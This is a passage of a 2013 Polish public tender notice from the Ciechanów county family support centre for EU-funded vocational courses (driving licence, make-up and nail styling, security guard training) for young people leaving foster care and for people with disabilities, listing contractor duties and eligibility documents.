zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),c)imienną listę,na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych;d)imienną listę,na której uczestnicy kursu będą potwierdzać korzystanie z cateringu(w każdym dniu kursu);e)indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu;f)protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego,jeżeli zostały przeprowadzone;12)przedłożyć dowód ubezpieczenia 3 uczestników na czas trwania kursu,13)wystawić zaświadczenia o ukończeniu kursu.14)Niezwłocznie,nie później jednak niż w ciągu 24 godzin od zdarzenia,poinformować Zamawiającego o:a)nie zgłaszaniu się uczestników na kurs,b)przerwaniu kursu lub rezygnacji uczestnika,c)innych sytuacjach,które mogą mieć wpływ na realizację programu kursu i umowy.15)przekazać Zamawiającemu,w terminie do 7 dni od dnia zakończenia kursu,następujące dokumenty:a)dziennik zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),c)imienną listę,na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,d) imienną listę,na której uczestnicy kursu potwierdzali korzystanie z cateringu(w każdym dniu kursu),e)kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu,f)zaświadczeń o ukończeniu przez uczestników kursu,g)kserokopie dowodu  wniesienia opłaty za egzamin końcowy zewnętrzny za każdego uczestnika kursu,j)kserokopie dowodu ubezpieczenia uczestników na czas trwania kursu,k)kserokopie zaświadczeń o ukończeniu kursu,l)ankiety oceniające kurs przeprowadzone wśród uczestników.16)przechowywać dokumenty potwierdzające realizację kursu do dnia 31.12.2020 r.
Część V Zorganizowanie i przeprowadzenie kursu ochrony osób i mienia I stopnia dla 
1osoby-usamodzielnianej wychowanki z zastępczych form opieki,mieszkanki powiatu ciechanowskiego-uczestniczki projektu Aktywność szansą na zatrudnienie 
i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.Program zajęć teoretycznych i praktycznych ma obejmować łącznie245godzin lekcyjnych.Zajęcia muszą odbywać się w dni robocze(od poniedziałku do piątku)w mieście Ciechanów.Szkolenie należy zrealizować w oparciu o przepisy ustawy z dnia 22sierpnia1997r. o ochronie osób i mienia(Dz.U. z 2005 r. Nr145,poz.1221 z późn,zm.),rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia7września2010r.w sprawie wymagań,jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych i transportowanych przez przedsiębiorców i inne jednostki organizacyjne(Dz.U.z 2010r.Nr166,poz.1128 z późn. zm.)oraz inne akty prawne z zakresu przedmiotu zamówienia.Wykonawca zobowiązany jest:1)Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.Program musi zawierać:a)nazwę i zakres kursu,b)podanie adresu miejsca,gdzie odbywać się będzie kurs,c)czas trwania kursu(daty i godziny)d)plan nauczania,określający zakres tematyczny zajęć i ich wymiar,e)cele kursu(przewidywane efekty).2)Zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach-w uzasadnionych przypadkach za pisemną zgodą Zamawiającego w trakcie szkolenia może nastąpić zmiana osób prowadzących szkolenie,3)zapewnić uczestnikowi kursu materiały dydaktyczne(w tym co najmniej: notes,długopis,skrypt/podręcznik),które staną się własnością uczestnika kursu,4)zapewnić podczas zajęć praktycznych sprzęt i akcesoria adekwatne do tematyki szkolenia(np.kajdanki,broń,tarcze strzelnicze,tonfy treningowe,sprzęt ratownictwa medycznego-fantomy,maski,itp.),5)zapewnić salę do zajęć z samoobrony,strzelnicę do zajęć strzeleckich,6)zapewnić uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych(tj.dwudaniowy obiad-zupa i drugie danie,kawę,herbatę,wodę mineralną gazowaną i niegazowaną,ciastka,ciasto,owoce),7)opłacić i zorganizować egzamin państwowy na licencję I stopnia pracownika fizycznej ochrony osób i mienia8)ubezpieczyć uczestnika  na czas trwania kursu,9)informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,a także oznakowania miejsca realizacji kursu,zgodnie z wymogami Rozporządzenia Rady(WE)nr1083/2006 z dnia 11lipca2006r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego,Europejskiego Funduszu Społecznego oraz Funduszu Spójności(Dz.Urz. UE L 210/25 z31.07.2006)oraz Rozporządzenia Komisji WE nr1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006(Dz.Urz.UE L 371/1 z27.12.2006)i wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007-2013.10)zapewnić uczestnikowi kursu warunki do nauki w oparciu o zasady BHP,11)przeprowadzić wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu kursu,m.in.na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu.12)prowadzić odpowiednią dokumentację:a)dziennik zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),c)imienną listę,na której uczestnik kursu będzie potwierdzać otrzymanie materiałów dydaktycznych;d)imienną listę,na której uczestnik kursu będzie potwierdzać korzystanie z cateringu(w każdym dniu kursu);e)indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika kursu;f)protokołu i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego,jeżeli zostały przeprowadzone;g)przedłożyć dowód ubezpieczenia uczestnika na czas trwania kursu,h)wystawić zaświadczenia o ukończeniu kursu.13)Niezwłocznie,nie później jednak niż w ciągu 24 godzin od zdarzenia,poinformować Zamawiającego o:a)nie zgłaszaniu się uczestnika na kurs,b)przerwaniu kursu lub rezygnacji uczestnika,c)innych sytuacjach,które mogą mieć wpływ na realizację programu kursu i umowy.14)przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu,następujące dokumenty:a)dziennik zajęć,b)imienną listę obecności uczestnika(w każdym dniu kursu),c)imienną listę,na której uczestnik kursu potwierdził otrzymanie materiałów dydaktycznych,d)imienną listę,na której uczestnik kursu potwierdzał korzystanie z cateringu(w każdym dniu kursu),e)kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej i praktycznej dla uczestnika kursu,f)zaświadczeń o ukończeniu przez uczestnika kursu,g)kserokopie dowodu wniesienia opłaty za egzamin końcowy zewnętrzny uczestnika kursu,j)kserokopie dowodu ubezpieczenia uczestnika na czas trwania kursu,k)kserokopie zaświadczeń o ukończeniu kursu,l) ankiety oceniające kurs przeprowadzone wśród uczestnika.15)przechowywać dokumenty potwierdzające realizację kursu do dnia 31.12.2020r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art.22 ust. 1 pzp metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże w okresie ostatnich trzech lat przed upływem terminu składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co najmniej dwóch usług odpowiadających przedmiotem i wartością usłudze będącej przedmiotem zamówienia, dofinansowanych ze środków Unii Europejskiej. Ocena metodą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże że dysponuje lub będzie dysponował: 
a)	co najmniej dwoma wykładowcami - każdy z Wykładowców musi legitymować się doświadczeniem w postaci przeprowadzenia co najmniej dwóch szkoleń w zakresie tematycznym odpowiadającym tej części zamówienia, o której udzielenie ubiega się Wykonawca. Zamawiający wymaga aby kadra bezpośrednio zaangażowana w prowadzenie szkoleń posiadała wykształcenie minimum średnie. Wykazane osoby muszą posiadać wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - dotyczy 1,2 i 3 części zamówienia.
b)	co najmniej czterema wykładowcami - każdy z Wykładowców musi legitymować się doświadczeniem w postaci przeprowadzenia co najmniej dwóch szkoleń w zakresie tematycznym odpowiadającym tej części zamówienia, o której udzielenie ubiega się Wykonawca. Zamawiający wymaga aby kadra bezpośrednio zaangażowana w prowadzenie szkoleń posiadała wykształcenie minimum średnie. Wykazane osoby muszą posiadać wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - dotyczy 4 i 5 części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-ciechanow.pl i http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w pkt. I.1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. 17 Stycznia 7, 06-400 Ciechanów, pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowany ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu prawa jazdy kat. C dla 2 osób, w tym: 1 usamodzielnianego wychowanka z zastępczych form opieki oraz 1 osoby niepełnosprawnej, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu prawa jazdy kat. C dla 2 osób, w tym: 1 usamodzielnianego wychowanka z zastępczych form opieki oraz 1 osoby niepełnosprawnej, mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej, pozwalającej na przystąpienie do egzaminu dającego uprawnienia do prowadzenia pojazdów w wyżej wymienionej kategorii. 
Program zajęć teoretycznych i praktycznych prawa jazdy kat. C w zakresie merytorycznym i czasowym, a także zakres posiadanych uprawnień przez osoby prowadzące kurs ma być zgodny z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz.U. z 2012 r. poz. 1019) wydanego na podstawie art. 32 ust. 3 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. Nr 30, poz. 151, z późniejszymi zmianami). Dodatkowa ilość praktycznej  nauki   jazdy dla każdego uczestnika kursu  ma wynosić co najmniej 15 godzin.  
Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w mieście Ciechanów w budynku o dogodnej lokalizacji dla osób dojeżdżających z terenu Powiatu Ciechanowskiego (położonego nie dalej niż 400 m od najbliższego przystanku komunikacji miejskiej).
Wykonawca zobowiązany jest:
1)Opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.
Program musi zawierać:
a)	nazwę i zakres kursu,
b)	podanie adresu miejsca, gdzie odbywać się będzie kurs,
c)	czas trwania kursu (daty i godziny)
d)	plan nauczania, określający zakres tematyczny zajęć i ich wymiar,
e)	cele kursu  (przewidywane efekty).
2)	zapewnić uczestnikom kursu salę wyposażoną w sprzęt niezbędny w zakresie realizacji tematyki szkolenia oraz samochody szkoleniowe,
3)		zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach -                     		w uzasadnionych przypadkach po rozpoczęciu szkolenia za pisemną zgodą 
		Zamawiającego może nastąpić zmiana osób prowadzących szkolenie,
4)	zapewnić uczestnikom kursu materiały dydaktyczne (w tym: notes, długopis,  podręcznik dla osób ubiegających się o prawo jazdy kat. C oraz testy na CD), które staną się własnością uczestników kursu,
5)	zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych (tj. dwudaniowy obiad - zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną i niegazowaną, ciastka, ciasto, owoce),
6)	zapewnić ubezpieczenie 2 osób - uczestników kursu przez okres trwania kursu,
7)	uwzględnić w cenie oferty koszt dodatkowych co najmniej 15 godzin nauki jazdy dla każdego uczestnika oraz egzaminu państwowego: teoretycznego i praktycznego,  dla każdego uczestnika kursu.
8)	informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej, a także
oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) 
i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013,
9)	zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP,
10)	przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu kursu, m. in. na podstawie formularza ankiety oceniającej i przedstawić jej wyniki Zamawiającemu,
11)	Prowadzić odpowiednią dokumentację:
a)	dziennik zajęć,
b)	imienną listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu będą potwierdzać otrzymanie materiałów dydaktycznych;
d)	imienną  listę , na której uczestnicy kursu  będą potwierdzać korzystanie z cateringu (w każdym dniu kursu);
e)	indywidualne karty przeprowadzonych zajęć w części teoretycznej i praktycznej dla 
każdego uczestnika    kursu  moduł  prawa jazdy kat. C;
f)	indywidualne arkusze przeprowadzonego egzaminu wewnętrznego teoretycznego 
i praktycznego osoby ubiegającej się o uprawnienie do prowadzenia pojazdów dla kat. C;
g)	wystawić  zaświadczenia  o ukończeniu przez uczestników szkolenia podstawowego dla osób ubiegających się o prawo jazdy kat. C;
12)	wystawić zaświadczenia potwierdzone podpisem uczestnika o wyjeżdżeniu przez niego dodatkowych co najmniej 15 godzin praktycznej nauki jazdy,
13)	przedłożyć dowód wniesienia opłaty za egzamin państwowy na prawo jazdy kat. C  dla 	każdego uczestnika kursu,
14)	 niezwłocznie, nie później jednak niż w ciągu 24 godzin od zdarzenia, poinformować Zamawiającego o:
 a) nie zgłaszaniu się uczestników na kurs;
 b) przerwaniu kursu lub rezygnacji uczestnika;
 c) innych sytuacjach, które mogą mieć wpływ na realizację programu kursu i umowy,
15)	przekazać Zamawiającemu, w terminie do 7 dni od dnia zakończenia kursu, następujące 	dokumenty:
a)	dziennik zajęć,
b)	imienną  listę obecności uczestnika  (w każdym dniu kursu),
c)	imienną listę, na której uczestnicy kursu  potwierdzali otrzymanie materiałów dydaktycznych,
d) imienną listę, na której uczestnicy kursu potwierdzali korzystanie z cateringu 
(w każdym dniu kursu),
e) kserokopie indywidualnych kart przeprowadzonych zajęć w części teoretycznej i praktycznej dla każdego uczestnika    kursu  moduł  prawa jazdy kat. C,
f) kserokopie indywidualnych  arkuszy przeprowadzonego egzaminu wewnętrznego teoretycznego i praktycznego osoby ubiegającej się o uprawnienie do prowadzenia pojazdów dla kat. C,
g)  kserokopie zaświadczeń o ukończeniu przez uczestników szkolenia podstawowego dla osób ubiegających się o prawo jazdy  kat. C,
h) zaświadczeń o wyjeżdżeniu przez uczestnika dodatkowych co najmniej 15 godzin praktycznej nauki jazdy,
i)  kserokopie  dowodu  wniesienia opłaty za egzamin państwowy na prawo jazdy kat. C za  każdego uczestnika,
j)  kserokopie dowodu ubezpieczenia uczestników na czas  trwania kursu,
k) kserokopie zaświadczeń o ukończeniu kursu,
l)  ankiety oceniające kurs przeprowadzone wśród uczestników.
16)	 przechowywać dokumenty potwierdzające realizację przedmiotowego kursu do dnia 31.12.2020 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 08.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu wizażu i stylizacji paznokci dla 5 osób, w tym: 2 osób przebywających w rodzinnej pieczy zastępczej i 3 osób niepełnosprawnych mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu wizażu i stylizacji paznokci dla 5 osób, w tym: 2 osób przebywających w rodzinnej pieczy zastępczej i 3 osób niepełnosprawnych mieszkańców powiatu ciechanowskiego - uczestników projektu Aktywność szansą na zatrudnienie i usamodzielnienie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Program zajęć teoretycznych i praktycznych ma obejmować 130 godzin lekcyjnych (w tym: 90 godzin - wizaż i 40 godzin - stylizacja paznokci).
Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w mieście Ciechanów, 
w budynku pozbawionym barier architektonicznych, o lokalizacji dogodnej dla osób dojeżdżających
z terenu Powiatu Ciechanowskiego (położonego nie dalej niż 400 m. od najbliższego przystanku komunikacji miejskiej).
Wykonawca zobowiązany jest:
1)	opracować program kursu i przedłożyć go Zamawiającemu w dniu składania ofert wraz z ofertą jako załącznik do niej.
	Program musi zawierać:
a)	nazwę i zakres kursu;
b)	miejsce, gdzie odbywać się będzie kurs;
c)	czas trwania kursu (data i godziny);
d)	plan nauczania określający tematy zajęć oraz ich wymiar;
2)	zapewnić uczestnikom kursu salę wyposażoną w sprzęt niezbędny w zakresie realizacji tematyki 	szkolenia, tj. fotele obrotowe, lustra, zestawy pędzli do makijażu, aplikatory do cieni, gąbki do 	podkładu, zestawy korektorów, palety: podkładów, pomadek, błyszczyków, pudrów i cieni, płyny 	micelarne, zalotki, sztuczne rzęsy, szczoteczki do rzęs i brwi, pensety kosmetyczne, eyelinery, 	konturówki do oczu, tusze do rzęs, stoliki kosmetyczne do stylizacji paznokci, lampki 	oświetleniowe, frezarki, profesjonalne lampy UV, sprzęt do pedicure (miski + jednorazowe 	wkłady, podnóżki), tipsy naturalne, szablony, klej do tipsów, gilotynki, zestaw pilników, bloki 	polerskie, zestaw żeli do manicure hybrydowego, lakiery hybrydowe, cleanery, płyn do 	zdejmowania tipsów, płyn do czyszczenia pędzelków, waciki bezpyłowe, pędzelki do nakładania 	żelu, oliwkę do skórek, primer, preparat do usuwania skórek, miseczki do manicure, cążki do 	wycinania skórek, kopytko ze stali chirurgicznej, ozdoby do paznokci, lakiery: linery, podkładowe, 	utwardzające, odżywki do paznokci, zmywacze, preparat odtłuszczający, ręczniki jednorazowe, 	środki dezynfekujące.
3)	zapewnić prowadzenie szkolenia przez osoby o odpowiednich kwalifikacjach -
	w uzasadnionych przypadkach za pisemną zgodą Zamawiającego może nastąpić w trakcie 	szkolenia  zmiana 	osób prowadzących szkolenie,
4)	zapewnić każdemu uczestnikowi catering każdego dnia kursu podczas zajęć teoretycznych           (tj. dwudaniowy obiad - zupa i drugie danie, kawę, herbatę, wodę mineralną gazowaną i niegazowaną, ciastka, ciasto, owoce),
5)	zapewnić ubezpieczenie 5 osób - uczestników kursu przez okres trwania kursu,
6)	zapewnić każdemu uczestnikowi materiały dydaktyczne (długopis, notes) i kuferek ze starterami zawierającymi niezbędne akcesoria, które staną się własnością uczestników kursu:
3.	Wizaż	4.	Stylizacja paznokci
Zestaw  pędzli: do nakładania podkładu, do pudru, ścięty ukośnie do różu, wachlarz, ścięty do brwi, zaokrąglony do cieni, liner do wykonywania kreski, płaski do ust	Profesjonalna lampa UV 36W tunelowa - 1 szt.
Aplikator z gąbki do cieni - 6 szt. - różne rodzaje	Żarówki 9W do kompletu - 4 szt.
Trójkątne gąbki do podkładu - 4 szt.	Żel clear (przezroczysty) 5ml - 1 szt.
Korektor - 6 kolorów	Żel pink (różowy) 5ml - 1 szt.
Paleta podkładów - 6 kolorów	Żel biały do frenchu
Paleta pomadek (10 kolorów)	Żel nabłyszczający wykończeniowy
Paleta  błyszczyków (10 kolorów)	Tipsy naturalne w rozmiarach od 1 do 10, elastyczne i mocne - 1 saszetka (100 szt.)
Paleta pudrów ( rozświetlający, matujący, bronzer, róż do policzków)	Szablony - 10 szt.
Płyn micelarny - 1 szt.	  Klej do tipsów 3g super mocny - 1 szt.
Lusterko stojące dwustronne, powiększenie x 5	Gilotyna - 1 szt.
Zalotka - 1 szt.	Pilnik prosty 80/80 - 2 szt.
Sztuczne rzęsy całe, kępki, z klejem do rzęs	Pilnik banan 100/180 - 2 szt.
